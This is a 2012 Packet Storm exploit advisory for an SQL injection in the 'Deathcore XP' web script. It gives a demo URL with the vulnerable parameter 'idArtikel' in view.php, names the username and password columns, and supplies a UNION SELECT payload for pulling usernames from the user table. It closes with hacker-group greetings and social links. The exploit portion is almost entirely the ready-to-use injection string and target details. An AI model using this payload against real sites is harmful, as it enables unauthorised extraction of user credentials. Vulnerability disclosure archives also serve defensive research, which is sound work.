Deathcore XP SQL Injection

2012-03-19T00:00:00
ID PACKETSTORM:110975
Type packetstorm
Reporter 3spi0n
Modified 2012-03-19T00:00:00

Description

                                        
                                            `# Exploit Title; Deathcore xp - SQL Injection Vulnerability  
# Date ; 19/03/12  
# Author ; 3spi0n  
# Script Vendor ; http://deathcore.xtgem.com/  
# Script Demo ; http://www.two-fire.website.org/  
# Category ; Webapps  
# Type ; Sql Injection  
# Tested on ; Ubuntu / Win7  
  
[#] Script Details ;  
  
- Demo ; http://www.two-fire.website.org/view.php?idArtikel=1  
  
- Columns ; username and password  
  
- Exploit ; [union select 1,2,username,4,5,6 from user]  
  
[#] Greetz ;  
  
- Grayhatz Corporation, www.Grayhatz.Co  
- My Official Blog, www.Offsec.in & www.Ryuzaki.in  
- Facebook.Com/3spi0ne - Twitter.Com/RigidusCO  
`